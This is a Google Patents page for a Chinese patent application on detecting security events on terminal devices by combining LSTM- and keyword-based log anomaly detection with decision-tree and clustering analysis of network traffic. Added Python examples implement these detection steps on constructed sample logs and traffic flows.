
CN119830273A - Event detection method and device, storage medium and electronic equipment - Google Patents


Info

Publication number: CN119830273A
Authority: CN (China)
Prior art keywords: data, event, detection result, detection, target event
Legal status: Pending
Application number: CN202411843210.7A
Other languages: Chinese (zh)
Inventors: 罗雅馨, 王迎, 李军, 李钽, 卓玲玲, 尚俊坤, 杨逍, 刘毅
Current assignee: China Construction Bank Corp Hubei Branch
Original assignee: China Construction Bank Corp Hubei Branch
Application filed by: China Construction Bank Corp Hubei Branch

Landscapes

  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The application discloses an event detection method and device, a storage medium and electronic equipment. The method comprises the steps of: deploying a lightweight security proxy service on terminal equipment; collecting operation data of the terminal equipment through the lightweight security proxy service; executing an abnormal value detection operation on system log data in the operation data and determining a first detection result; executing a decision tree detection operation on network flow data in the operation data and determining a second detection result; determining, based on the first detection result and the second detection result, whether a target event occurs in the terminal equipment; and, when the target event exists, generating an alarm message according to the target event, wherein the alarm message comprises at least one of a file path and a process path that caused the target event, and the file path and the process path are used for locating the source and influence range of the target event. The application solves the technical problem of low detection accuracy caused by relying on a single event detection mode.

Description

Event detection method and device, storage medium and electronic equipment
Technical Field
The present application relates to the field of computers, and in particular, to an event detection method and apparatus, a storage medium, and an electronic device.
Background
Conventional security operation systems typically rely on a single event detection approach, such as analysing abnormal behaviour from system logs alone, or monitoring suspicious patterns in network traffic alone. A single detection strategy often cannot comprehensively cover the diversity of security threats, and hidden attack behaviours are easily missed, so detection accuracy is low. Especially in a hybrid IT environment, a single detection mode struggles to adapt to the complex requirements of different operating systems and application software, which increases the risk of false alarms and missed detections and reduces the overall efficiency of security event detection.
In summary, the related art has the technical problem that detection accuracy is low because detection depends only on a single event detection mode.
In view of the above problems, no effective solution has been proposed at present.
Disclosure of Invention
The embodiment of the application provides an event detection method and device, a storage medium and electronic equipment, which at least solve the technical problem of low detection accuracy caused by a single event detection mode.
According to one aspect of the embodiment of the application, an event detection method is provided, which comprises the steps of deploying a lightweight security proxy service on a terminal device, collecting operation data of the terminal device through the lightweight security proxy service, executing an outlier detection operation on system log data in the operation data, determining a first detection result, executing a decision tree detection operation on network traffic data in the operation data, determining a second detection result, determining whether a target event occurs in the terminal device or not based on the first detection result and the second detection result, and generating an alarm message according to the target event in the condition that the target event exists, wherein the alarm message comprises at least one of a file path and a process path which lead to the occurrence of the target event, and the file path and the process path are used for locating the source and the influence range of the target event.
According to another aspect of the embodiment of the application, an event detection system is provided, which comprises a lightweight security agent module, an operation and maintenance management platform module, a log monitoring analysis platform module, an automated operation and maintenance module, and an event detection response module, wherein the lightweight security agent module is used for collecting operation data of terminal equipment and executing instructions sent by the operation and maintenance management platform, the operation and maintenance management platform module is used for managing user access authority and processing command distribution and flow mirroring, the log monitoring analysis platform module is used for executing an abnormal value detection operation on system log data in the operation data, determining a first detection result, and executing a decision tree detection operation on network flow data in the operation data to determine a second detection result, the automated operation and maintenance module is used for executing batch script execution and automatic configuration deployment on the terminal equipment according to system operation instructions and configuration scripts, and the event detection response module is used for determining whether a target event occurs on the terminal equipment according to the first detection result and the second detection result, and generating an alarm message according to the target event when the target event exists, wherein the alarm message comprises at least one of a file path and a process path that caused the target event, and the file path and the process path are used for locating the source and the influence range of the target event.
According to another aspect of the embodiment of the application, an event detection device is provided, which comprises a deployment module, an acquisition module, an execution module, a determination module and a generation module, wherein the deployment module is used for deploying a lightweight security proxy service on a terminal device, the acquisition module is used for acquiring operation data of the terminal device through the lightweight security proxy service, the execution module is used for executing an abnormal value detection operation on system log data in the operation data, determining a first detection result, executing a decision tree detection operation on network flow data in the operation data and determining a second detection result, the determination module is used for determining whether a target event occurs to the terminal device or not based on the first detection result and the second detection result, and the generation module is used for generating an alarm message according to the target event in the condition that the target event exists, wherein the alarm message comprises at least one of a file path and a process path which lead to the occurrence of the target event, and the file path and the process path are used for locating the source and the influence range of the target event.
Optionally, the device is used for executing abnormal value detection operation on the system log data in the operation data, determining a first detection result, namely processing the system log data according to a long-short-term memory network model to obtain a target threshold range, carrying out regression analysis on the system log data based on the target threshold range, determining the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary, and determining the first detection result, wherein the first detection result is used for indicating whether the system log data is abnormal or not.
Optionally, the device determines the second detection result by performing a feature value decomposition on the network traffic data to obtain a target feature vector describing traffic behaviour, processing the target feature vector with a pre-trained decision tree model to obtain similar network traffic data, and clustering the similar network traffic data to obtain the second detection result, wherein the second detection result indicates whether abnormal traffic exists in the network traffic data; and, where the network traffic data includes captured network packets, converting the captured packets into image data and performing cluster analysis on the image data to obtain the second detection result.
Optionally, the device is configured to determine whether the terminal device has a target event based on the first detection result and the second detection result by at least one of: determining that the terminal device has the target event if the first detection result indicates that the system log data contains an abnormal log, and determining that the terminal device has the target event if the second detection result indicates that the network traffic data contains abnormal traffic.
Optionally, the device is used for generating an alarm message according to the target event in the condition that the target event exists, determining at least one of the file path and the process path related to the target event in the condition that the target event exists, determining the event type of the target event based on the file path and/or the process path, and generating the alarm message according to the event type.
Optionally, the device is further used for controlling an operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service under the condition that the event type is a file alarm type so as to acquire system environment information of the terminal equipment and storing the system environment information into a log file under an alarm record directory, wherein the system environment information comprises process information currently running by the terminal equipment.
Optionally, the device is further used for storing the system environment information into the log file and calling a target processing script to process the target event when the event type is a process alarm type and the same history alarm type is acquired, wherein the target processing script is used for executing a preset repairing operation to repair a system error caused by the target event, and setting the forwarding weight of a reverse proxy server of the terminal equipment to be 0 through the lightweight security proxy service when the event type is the process alarm type and the same history alarm type is not acquired.
According to a further aspect of embodiments of the present application, there is also provided a computer-readable storage medium having a computer program stored therein, wherein the computer program is arranged to perform the above-described event detection method when run.
According to yet another aspect of embodiments of the present application, there is provided a computer program product or computer program comprising computer instructions stored in a computer readable storage medium. The processor of the computer device reads the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions, so that the computer device performs the event detection method as above.
According to still another aspect of the embodiments of the present application, there is also provided an electronic device including a memory in which a computer program is stored, and a processor configured to execute the event detection method described above by the computer program.
In the embodiment of the application, a lightweight security proxy service is deployed on a terminal device, operation data of the terminal device is acquired through the lightweight security proxy service, an abnormal value detection operation is carried out on system log data in the operation data and a first detection result is determined, a decision tree detection operation is carried out on network traffic data in the operation data and a second detection result is determined, whether a target event occurs in the terminal device is determined based on the first detection result and the second detection result, and an alarm message is generated according to the target event, wherein the alarm message comprises at least one of a file path and a process path that caused the target event, and the file path and the process path are used for locating the source and the influence range of the target event. By integrating multi-dimensional data detection and intelligent analysis, the event detection accuracy and response speed are improved, the technical effect of comprehensive and efficient security event monitoring and alarming is achieved, and the technical problem of low detection accuracy caused by depending only on a single event detection mode is solved.
Drawings
The accompanying drawings, which are included to provide a further understanding of the application and are incorporated in and constitute a part of this specification, illustrate embodiments of the application and together with the description serve to explain the application and do not constitute a limitation on the application. In the drawings:
FIG. 1 is a schematic illustration of an application environment for an alternative event detection method according to an embodiment of the application;
FIG. 2 is a flow chart of an alternative event detection method according to an embodiment of the application;
FIG. 3 is a schematic diagram of an alternative event detection method according to an embodiment of the application;
FIG. 4 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application;
FIG. 5 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application;
FIG. 6 is a schematic diagram of an alternative event detection device according to an embodiment of the application;
FIG. 7 is a schematic diagram of an alternative event detection product according to an embodiment of the application;
Fig. 8 is a schematic structural view of an alternative electronic device according to an embodiment of the present application.
Detailed Description
In order that those skilled in the art will better understand the present application, a technical solution in the embodiments of the present application will be clearly and completely described below with reference to the accompanying drawings in which it is apparent that the described embodiments are only some embodiments of the present application, not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the present application without making any inventive effort, shall fall within the scope of the present application.
It should be noted that the terms "first," "second," and the like in the description and the claims of the present application and the above figures are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments of the application described herein may be implemented in sequences other than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus.
The application is illustrated below with reference to examples:
According to an aspect of the embodiment of the present application, there is provided an event detection method. Optionally, in this embodiment, the event detection method described above may be applied to a hardware environment constituted by the server 101 and the terminal device 103 as shown in fig. 1. As shown in fig. 1, a server 101 is connected to a terminal device 103 through a network and can be used to provide services to the terminal device or to an application 107 installed on the terminal device, which may be a video application, an instant messaging application, a browser application, an educational application, a game application, or the like. The database 105 may be provided on the server or independently of the server, and may be used to provide a data storage service for the server 101, for example a game data storage server. The above network may include, but is not limited to, a wired network or a wireless network, where the wired network includes a local area network, a metropolitan area network and a wide area network, and the wireless network includes Bluetooth, WIFI and other networks implementing wireless communication. The terminal device 103 may be a terminal configured with an application program, and may include, but is not limited to, at least one of a mobile phone (such as an Android phone or an iOS phone), a notebook computer, a tablet computer, a palm computer, a MID (Mobile Internet Device), a PAD, a desktop computer, a smart television, a smart voice interaction device, a smart home appliance, a vehicle-mounted terminal, an aircraft, a Virtual Reality (VR) terminal, an Augmented Reality (AR) terminal, a Mixed Reality (MR) terminal, etc. The above server may be a single server or a cloud server.
As shown in connection with fig. 1, the above-mentioned event detection method may be performed by an electronic device, which may be a terminal device or a server, and the above-mentioned event detection method may be implemented by the terminal device or the server, respectively, or by both the terminal device and the server.
The above is merely an example, and the present embodiment is not particularly limited.
Optionally, as an optional embodiment, as shown in fig. 2, the event detection method includes:
S202, deploying a lightweight security proxy service on terminal equipment;
S204, collecting operation data of the terminal equipment through the lightweight security proxy service;
Optionally, in the embodiment of the present application, the lightweight security proxy service refers to a service module running on a terminal device and responsible for collecting and analyzing system logs, network traffic and running status information, including, but not limited to, CPU usage, memory occupation, file system activity, network connection status, and other data. The service module has compact design, occupies less resources, can stably operate for a long time, and can not obviously influence the normal operation of the terminal equipment.
It should be noted that, the deployment of the lightweight security proxy service can be flexibly adapted to different terminal devices, whether it is a physical server, a virtual machine or a container environment, or even an edge computing node, which is not limited by the present application.
In addition, the collected operation data types can be expanded according to actual requirements, such as system call records, inter-process communication conditions and the like, so as to meet more complex safety monitoring requirements. The operation mode and the data acquisition frequency of the service module are also configurable, and can be adjusted according to the performance and the security policy of the terminal equipment so as to balance the monitoring effect and the resource consumption. In the embodiment of the application, when the utilization rate of the system resource reaches the threshold value, the lightweight security proxy service can also automatically adjust the running state of the lightweight security proxy service so as to reduce the influence on the terminal equipment and ensure the persistence of security monitoring and the stability of system performance.
S206, performing abnormal value detection operation on system log data in the operation data, determining a first detection result, performing decision tree detection operation on network flow data in the operation data, and determining a second detection result;
Optionally, in the embodiment of the present application, the system log data refers to the various record information generated while the terminal device is running, including, but not limited to, the operating system's system log, application program logs, security logs, and the like, in which information such as device state, user activity and system events is recorded; it is one of the important data sources for detecting abnormal behaviour.
The abnormal value detection operation performed on the system log data refers to identifying log records that differ significantly from the normal operation pattern through statistical analysis, machine learning or data mining techniques, so as to determine whether a potential security threat or abnormal behaviour exists. In the embodiment of the application, the first detection result can be generated by constructing a keyword dictionary to detect special keywords and by predicting the log trend with an LSTM and setting a threshold range, so that the abnormal conditions in the system log are reflected.
Optionally, in the embodiment of the present application, the network traffic data refers to packet information generated by the terminal device during network communication, including, but not limited to, a source address, a destination address, a protocol type, a port number, a packet size, and the like of a packet. The decision tree detection operation of the network traffic data refers to analyzing traffic characteristics by using a decision tree algorithm, and identifying abnormal modes in the network traffic, such as abnormal traffic size, nonstandard protocol use, high-frequency specific port access and the like, so as to determine a second detection result. By decomposing the network traffic data into a plurality of characteristic values and utilizing a plurality of decision tree models for combined analysis, whether the network behavior is abnormal can be more accurately judged.
It should be noted that, the specific implementation manners of the outlier detection and the decision tree detection may be diversified, for example, the outlier detection may be performed by using a plurality of methods such as statistical-based outlier detection, machine-learning-based outlier detection, or rule-based outlier detection, and the decision tree detection may also be performed by using different decision tree algorithms, such as ID3, C4.5, CART, or the like, or by combining with other machine learning models, such as Support Vector Machines (SVM), neural networks, and the like, to perform more complex flow analysis.
In addition, parameters such as the execution frequency of the detection operation, the granularity of data acquisition, the period of model training and the like can also be adjusted according to actual scenes and requirements, and the application is not limited to the parameters.
S208, determining whether a target event occurs to the terminal equipment based on the first detection result and the second detection result;
S210, generating an alarm message according to the target event in the presence of the target event, wherein the alarm message comprises at least one of a file path and a process path which cause the target event to occur, and the file path and the process path are used for locating the source and the influence range of the target event.
Optionally, in the embodiment of the present application, the first detection result and the second detection result refer to analysis conclusion obtained after performing outlier detection on the system log data and performing decision tree detection on the network traffic data, which include, but are not limited to, abnormal log records occurring on the terminal device, abnormal modes in network behavior, and possible potential security threats.
Illustratively, in the presence of a target event, an alert message is generated that contains specific information, such as at least one of a file path and a process path, that caused the target event to occur. The file path refers to the file location of the abnormal behavior or security event, while the process path points to the running process of the trigger event.
It should be noted that the generation manner and content of the alarm message may be adjusted according to the nature and severity of the target event. For example, for high-risk events the alert information may be more detailed, including a specific description of the event, the risk level and suggested countermeasures, while for lower-risk anomalies only basic file or process information may need to be provided. The system can also automatically send messages to different operation and maintenance teams or individuals according to the priority of the alarms, so that important events are processed in time. In addition, the sending channel of the alarm message is configurable, for example mail, short message or system notification, and the application is not limited in this respect.
In an exemplary embodiment, taking an application scenario of an enterprise data center as an example, the data center has a large number of servers, and real-time security monitoring and operation and maintenance management are required for the servers. First, a lightweight security proxy service is deployed on each server, which is responsible for continuously observing and collecting running data of the servers, including system log data and network traffic data.
The lightweight security proxy service then periodically collects system log data, such as system start-up records, user login attempts, file access history, process activity information, etc., during the running of the server. The data are then transmitted to a log monitoring analysis platform, which is the core component of the secure operation and maintenance system, for outlier detection operations. Based on historical data and a preset abnormality detection model, the analysis platform can identify log records which are inconsistent with a normal behavior mode, and a first detection result, namely the safety state of a system log layer, is determined.
Meanwhile, the lightweight security proxy service also collects network flow data of the server, including information such as source address, destination address, protocol type, packet size, frequency and the like of the data packet. And transmitting the network traffic data to an operation and maintenance management platform, analyzing the traffic characteristics through a decision tree model, and judging whether abnormal network communication behaviors exist, such as mass data transmission, non-standard protocol use, high-frequency specific port access and the like, so as to determine a second detection result, namely the security state of the network traffic layer.
Then, the security operation and maintenance system comprehensively evaluates whether a target event, such as malware infection, unauthorized access, data leakage and other security problems, occurs to the server based on the first detection result and the second detection result. If a target event is detected, the system will generate detailed alert messages based on the nature and scope of the event. For example, if the system log detects that suspicious files are frequently accessed, the alarm message can contain paths of the files to help operation and maintenance personnel to quickly locate problem files, and if the network traffic detection finds that abnormal data packets exist, the alarm message can provide a process path for triggering events to be convenient for tracing the source of network behaviors.
Further, the generation of the alarm message not only includes specific information of the event, but also includes risk level of the event, suggested countermeasures and the like, so that the operation and maintenance personnel can quickly take action to limit the influence range of the event.
In general, enterprises can construct an efficient and intelligent security operation and maintenance system through deployment and data acquisition, outlier detection and decision tree detection operation of lightweight security proxy services, and target event judgment and alarm message generation based on the results, so that servers of a data center are effectively protected from security threats.
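The traffic-side decision tree detection, the combination of the two detection results and the alarm generation from the scenario above, as an added Python example that is not part of the patent: a hand-written decision tree stands in for the pre-trained model, flows are grouped by the tree's label in place of the clustering step, the first detection result is passed in as a constructed dict, the rule that a present process path makes the alarm a process alarm type is an assumption, and all flows, addresses and paths are constructed.

```python
from collections import defaultdict

# Constructed sample: per-flow records with the fields the text lists for
# network traffic data (addresses, protocol, port, packet size) plus a packet
# rate and the process that owns the socket, which supplies the process path.
SAMPLE_FLOWS = [
    {"src": "10.0.0.12", "dst": "10.0.0.20", "proto": "tcp", "dport": 443,
     "bytes": 5_200, "pkts_per_min": 30, "process": "/usr/bin/curl"},
    {"src": "10.0.0.12", "dst": "198.51.100.7", "proto": "tcp", "dport": 4444,
     "bytes": 9_800_000, "pkts_per_min": 2_400, "process": "/tmp/updater"},
    {"src": "10.0.0.12", "dst": "10.0.0.53", "proto": "udp", "dport": 53,
     "bytes": 180, "pkts_per_min": 12, "process": "/usr/sbin/systemd-resolved"},
    {"src": "10.0.0.12", "dst": "10.0.0.30", "proto": "tcp", "dport": 8443,
     "bytes": 3_000, "pkts_per_min": 5, "process": "/usr/bin/python3"},
]

# Constructed first detection result, as the log-side analysis would hand it over.
SAMPLE_FIRST_RESULT = {"abnormal": True, "file_paths": ["/tmp/updater"]}

# Assumption: ports treated as "standard" for the nonstandard-port split.
STANDARD_PORTS = {22, 53, 80, 123, 443}


def feature_vector(flow):
    """Feature decomposition: the values the decision tree splits on."""
    return {
        "bytes": flow["bytes"],
        "rate": flow["pkts_per_min"],
        "nonstandard_port": flow["dport"] not in STANDARD_PORTS,
    }


def decision_tree_detect(features):
    """Hand-written tree standing in for the pre-trained decision tree model.

    The splits mirror the anomaly patterns the text names: abnormal traffic
    size, nonstandard port use and high-frequency access to a specific port.
    Returns "normal" or an anomaly label.
    """
    if features["bytes"] > 1_000_000:
        return "bulk-transfer"
    if features["nonstandard_port"]:
        if features["rate"] > 600:
            return "high-frequency-nonstandard-port"
        return "nonstandard-port"
    return "normal"


def second_detection_result(flows):
    """Classify every flow, then group (cluster) flows that share a label."""
    clusters = defaultdict(list)
    for idx, flow in enumerate(flows):
        clusters[decision_tree_detect(feature_vector(flow))].append(idx)
    anomalies = [
        {"flow": idx, "label": label, "process_path": flows[idx]["process"]}
        for label, members in clusters.items() if label != "normal"
        for idx in members
    ]
    return {"abnormal": bool(anomalies), "anomalies": anomalies,
            "clusters": dict(clusters)}


def target_event_exists(first_result, second_result):
    """Either an abnormal log or abnormal traffic is enough for a target event."""
    return bool(first_result["abnormal"] or second_result["abnormal"])


def generate_alarm(first_result, second_result):
    """Build the alarm message: the file path and/or process path behind the
    event plus an event type derived from which paths are present
    (assumption: a process path present -> process alarm type, else file)."""
    if not target_event_exists(first_result, second_result):
        return None
    file_paths = list(first_result.get("file_paths", []))
    process_paths = sorted({a["process_path"] for a in second_result["anomalies"]})
    return {
        "event_type": "process" if process_paths else "file",
        "file_paths": file_paths,
        "process_paths": process_paths,
        "indicators": [a["label"] for a in second_result["anomalies"]],
    }
```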
According to the embodiment of the application, a lightweight security proxy service is deployed on the terminal equipment, the operation data of the terminal equipment is acquired through the lightweight security proxy service, an abnormal value detection operation is carried out on the system log data in the operation data and a first detection result is determined, a decision tree detection operation is carried out on the network traffic data in the operation data and a second detection result is determined, whether the terminal equipment has a target event is determined based on the first detection result and the second detection result, and an alarm message is generated according to the target event when the target event exists, wherein the alarm message comprises at least one of a file path and a process path that caused the target event, and the file path and the process path are used for locating the source and the influence range of the target event. By integrating multi-dimensional data detection and intelligent analysis, the event detection accuracy and response speed are improved, the technical effect of comprehensive and efficient security event monitoring and alarming is achieved, and the technical problem of low detection accuracy caused by a single event detection mode is solved.
The step of executing the abnormal value detection operation on the system log data in the operation data and determining the first detection result comprises: processing the system log data with a long short-term memory network model to obtain a target threshold range and carrying out regression analysis on the system log data based on the target threshold range to determine the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary to determine the first detection result, wherein the first detection result indicates whether the system log data is abnormal.
Optionally, in the embodiment of the present application, the long short-term memory network model refers to a deep learning model applied to time series data processing, including but not limited to an LSTM (Long Short-Term Memory) network, which can capture long-term dependencies in data and is suitable for analysing sequence data such as system logs. The keyword dictionary refers to a predefined set of vocabulary related to security events, including but not limited to "error", "failed", "warning" and the like, used for rapid screening of potential anomalies in the system log.
It should be noted that the above outlier detection operation may be implemented by various techniques, such as statistical methods, machine learning models and data mining techniques, which the present application does not limit. The processing of the system log data may likewise vary: for example, a time sliding window statistical method combined with LSTM prediction, or keyword matching combined with a rule engine for real-time monitoring. The specific technical scheme is chosen according to the characteristics of the log data and the requirements of security detection.
In one exemplary embodiment, after the system log data is collected by the lightweight security proxy service, the operation and maintenance management platform inputs the log data into a long short-term memory network model that has been trained to predict the fluctuation range of the log data in the normal operating state, i.e. the target threshold range. Once the actual value of a system log metric falls outside this target threshold range, the system log is regarded as abnormal and a first detection result is generated. Meanwhile, the system can also rapidly screen the log data with the keyword dictionary; if a log entry containing a high-risk keyword is found, a first detection result indicating a security anomaly is generated immediately.
According to the embodiment of the application, processing the system log data with the long short-term memory network model is combined with keyword dictionary detection, so that abnormal behaviour in the system log data is identified and located efficiently, security risk is reduced, operation and maintenance efficiency is improved, and the safe and stable operation of the terminal equipment is ensured.
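The following is an added example of the first-detection-result logic described above; it is not code from the patent. The LSTM forecast is replaced by a rolling mean/standard-deviation band (an assumption, so the example runs on the Python standard library alone; a trained LSTM would supply the same (low, high) pair per step), and the metric series, log lines and most of the keyword dictionary are constructed here. The source only names "error", "failed" and "warning" as keywords.

```python
"""Added example (not the patent's code): threshold-band outlier check plus
keyword-dictionary scan over system log data. The LSTM is replaced by a
rolling mean/stdev predictor; sample data is constructed."""
import re
import statistics
from typing import Dict, List, Optional, Tuple

# Constructed sample: one metric value per 10 s agent sample (e.g. CPU %).
METRIC_SERIES = [41, 43, 40, 42, 44, 41, 43, 42, 40, 43, 42, 41, 97, 43, 42]

# Constructed log lines in syslog layout.
LOG_LINES = [
    "Dec 01 10:00:01 host1 sshd[1201]: Accepted publickey for deploy from 10.0.0.5",
    "Dec 01 10:00:12 host1 sshd[1202]: Failed password for root from 203.0.113.7 port 5122",
    "Dec 01 10:00:13 host1 kernel: app[2210]: segfault at 0 ip 00007f3a sp 00007ffd",
    "Dec 01 10:00:20 host1 cron[1300]: (deploy) CMD (/opt/backup.sh)",
]

# Keyword dictionary; the text names "error", "failed", "warning" (the rest is assumed).
KEYWORD_DICT = {
    "permission denied": "high",
    "segfault": "high",
    "error": "medium",
    "failed": "medium",
    "warning": "low",
}
# Longest keywords first so multi-word entries win over their substrings.
_KEYWORD_RE = re.compile(
    "|".join(re.escape(k) for k in sorted(KEYWORD_DICT, key=len, reverse=True)),
    re.IGNORECASE,
)


def predict_threshold_range(history: List[float], k: float = 3.0) -> Tuple[float, float]:
    """Stand-in for the LSTM: expected band = mean +/- k * stdev of the window."""
    if len(history) < 2:
        raise ValueError("need at least two samples to estimate a range")
    mean = statistics.fmean(history)
    stdev = statistics.pstdev(history) or 1.0  # no zero-width band on flat data
    return mean - k * stdev, mean + k * stdev


def detect_metric_outliers(series: List[float], window: int = 8, k: float = 3.0):
    """Slide a window over the series; each sample is checked against the band
    predicted from the samples before it. Returns (index, value, (low, high))."""
    outliers = []
    for i in range(window, len(series)):
        low, high = predict_threshold_range(series[i - window:i], k)
        if not low <= series[i] <= high:
            outliers.append((i, series[i], (low, high)))
    return outliers


def scan_log_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (keyword, severity) for the first dictionary hit, else None."""
    m = _KEYWORD_RE.search(line)
    if not m:
        return None
    key = m.group(0).lower()
    return key, KEYWORD_DICT[key]


def first_detection_result(series: List[float], lines: List[str]) -> Dict:
    """Combine both checks; the log data is abnormal if either check fires."""
    metric_outliers = detect_metric_outliers(series)
    keyword_hits = []
    for ln in lines:
        hit = scan_log_line(ln)
        if hit:
            keyword_hits.append((ln, hit))
    return {
        "abnormal": bool(metric_outliers or keyword_hits),
        "metric_outliers": metric_outliers,
        "keyword_hits": keyword_hits,
    }


if __name__ == "__main__":
    print(first_detection_result(METRIC_SERIES, LOG_LINES))
```

The band is predicted only from samples before the one being checked, so a spike widens the band for later samples rather than masking itself; with a real LSTM the same holds as long as the model is not retrained on the anomalous window.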
Executing the decision tree detection operation on the network traffic data in the operation data to determine the second detection result comprises: performing a feature extraction ("eigenvalue decomposition") operation on the network traffic data to obtain target feature vectors describing traffic behaviour; processing the target feature vectors with a pre-trained decision tree model to obtain similar network traffic data; and clustering the similar network traffic data to obtain the second detection result, which indicates whether abnormal traffic exists in the network traffic data. When the network traffic data comprises network capture data packets, the network capture data packets are converted into image data and cluster analysis is performed on the image data to obtain the second detection result.
Optionally, in the embodiment of the present application, the network traffic data refers to the data generated by the terminal device in network communication, including but not limited to source address, destination address, protocol type, packet size, timestamp and the like. The feature extraction ("eigenvalue decomposition") operation converts the network traffic data into a set of numerical values describing its behavioural characteristics; the target feature vector is that set of values and systematically reflects the characteristics of the traffic. The pre-trained decision tree model is used to identify abnormal network behaviour: by analysing the target feature vectors it finds network traffic data similar to known abnormal patterns. Cluster analysis then groups that similar traffic so that the data in each group is highly similar, from which the presence of an abnormal traffic pattern is detected.
It should be noted that there are various methods for processing and analysing network traffic data, such as support vector machines (SVMs), neural networks (NNs) and random forests (RFs), which the present application does not limit. Feature extraction can be based on different traffic metrics, and the specific algorithms for the decision tree model and the cluster analysis can be selected according to actual requirements.
In one exemplary embodiment, the lightweight security proxy service continuously monitors the network traffic on the terminal device, collects detailed network data and performs feature extraction to generate target feature vectors. The operation and maintenance management platform then processes the feature vectors with a pre-trained decision tree model to identify network traffic data similar to known anomaly patterns. The similar traffic is further grouped by cluster analysis to judge whether abnormal traffic behaviour exists. If the network traffic data contains network capture packets (pcap files), the packets are converted into image data and an additional cluster analysis is performed with image processing techniques, so that anomalies in the network can be detected in a more intuitive manner.
According to the embodiment of the application, the network traffic data is detected by feature extraction, decision tree model processing and cluster analysis, so that abnormal behaviour in the network traffic of the terminal equipment is identified and warned of precisely, the network state is monitored in real time, the system is protected from network threats, and the security and efficiency of the whole operation and maintenance process are effectively improved.
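The following is an added example of the second-detection-result pipeline described above; it is not code from the patent. The "pre-trained decision tree" is a hand-specified tree (an assumption standing in for the trained model), clustering is a grouping of suspicious flows by source address, the pcap step is a payload-bytes-to-grayscale-grid conversion, and the flow records are constructed.

```python
"""Added example (not the patent's code): feature extraction, decision-tree
classification, clustering and pcap-to-image conversion on constructed flows.
The tree below is hand-specified, not trained."""
from collections import defaultdict
from typing import Dict, List, Tuple, Union

# Constructed flow records:
# (src, dst, dport, proto, packets, bytes, duration_s, syn_only_packets)
FLOWS = [
    ("10.0.0.5",    "10.0.0.20", 443,  "tcp", 120,  96000,  12.0, 1),
    ("203.0.113.7", "10.0.0.20", 22,   "tcp", 3,    180,    0.05, 3),
    ("203.0.113.7", "10.0.0.20", 23,   "tcp", 3,    180,    0.05, 3),
    ("203.0.113.7", "10.0.0.20", 3389, "tcp", 3,    180,    0.05, 3),
    ("10.0.0.5",    "10.0.0.53", 53,   "udp", 2,    140,    0.10, 0),
    ("10.0.0.9",    "10.0.0.20", 8080, "tcp", 5000, 300000, 2.0,  0),
]

# Tree node: (feature, threshold, left_if_<=, right_if_>); a str is a leaf label.
Node = Union[str, Tuple[str, float, "Node", "Node"]]
TREE: Node = (
    "syn_ratio", 0.9,
    ("avg_pkt_size", 100.0,
        ("pps", 50.0, "benign", "suspicious"),   # small packets at high rate: flood
        "benign"),                                # normal-sized packets
    "suspicious",                                 # almost only SYNs: half-open scan
)


def extract_features(flow) -> Dict[str, float]:
    """Turn one flow record into the target feature vector (the text's
    'eigenvalue decomposition' step): per-flow behavioural statistics."""
    _src, _dst, dport, proto, pkts, nbytes, duration, syn_only = flow
    return {
        "avg_pkt_size": nbytes / pkts,
        "pps": pkts / max(duration, 1e-3),
        "syn_ratio": syn_only / pkts,
        "is_udp": 1.0 if proto == "udp" else 0.0,
        "dport": float(dport),
    }


def classify(features: Dict[str, float], node: Node = TREE) -> str:
    """Walk the tree until a leaf label is reached."""
    while not isinstance(node, str):
        feat, thr, left, right = node
        node = left if features[feat] <= thr else right
    return node


def second_detection_result(flows) -> Dict:
    """Classify every flow, then cluster the suspicious ones by source so a
    scan (one source, many ports) shows up as a single cluster."""
    clusters: Dict[str, List[Tuple]] = defaultdict(list)
    for flow in flows:
        if classify(extract_features(flow)) == "suspicious":
            clusters[flow[0]].append(flow)
    summary = {
        src: {"flows": len(fl), "ports": sorted({f[2] for f in fl})}
        for src, fl in clusters.items()
    }
    return {"abnormal": bool(clusters), "clusters": summary}


def payload_to_image(payload: bytes, width: int = 16) -> List[List[int]]:
    """Lay packet payload bytes out as rows of `width` grayscale pixels
    (zero-padded), the representation the text clusters with image methods."""
    padded = payload + bytes(-len(payload) % width)
    return [list(padded[i:i + width]) for i in range(0, len(padded), width)]


if __name__ == "__main__":
    print(second_detection_result(FLOWS))
```

Grouping by source is the simplest clustering that turns three individually weak signals (one short SYN-only flow each to ports 22, 23 and 3389) into one strong one; a distance-based clusterer over the feature vectors would be the general form.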
Determining whether the terminal device has a target event on the basis of the first detection result and the second detection result includes at least one of: determining that the terminal device has the target event when the first detection result indicates that the system log data contains an abnormal log; and determining that the terminal device has the target event when the second detection result indicates that the network traffic data contains abnormal traffic.
Optionally, in the embodiment of the present application, the first detection result refers to the analysis conclusion obtained after performing the outlier detection operation on the system log data, and indicates whether the system log data shows abnormal behaviour or signs of a security event; the second detection result refers to the network activity security state determined after performing the decision tree detection operation on the network traffic data, and indicates whether the network traffic data contains abnormal traffic.
It should be noted that, the logic for determining whether the terminal device has a target event may be adjusted according to a specific application scenario and a security policy, which is not limited in the present application.
For example, the system may be set to trigger an event response only when the first detection result and the second detection result both indicate an anomaly, or it may adopt a more cautious strategy that starts the event investigation procedure as soon as either result indicates an anomaly.
In one exemplary embodiment, after receiving the operation data returned by the lightweight security proxy service, the security operation and maintenance system first processes the system log data and the network traffic data to generate the first detection result and the second detection result. If the first detection result indicates that an abnormal log entry appears in the system log data, or the second detection result confirms that abnormal traffic exists in the network traffic data, the system immediately judges that the terminal equipment may have suffered a target event, such as a malware infection, unauthorised access or data leakage. The system then starts the corresponding event handling flow, including generating an alarm message, triggering a security policy adjustment or starting an emergency response plan, so as to isolate and resolve the security issue quickly.
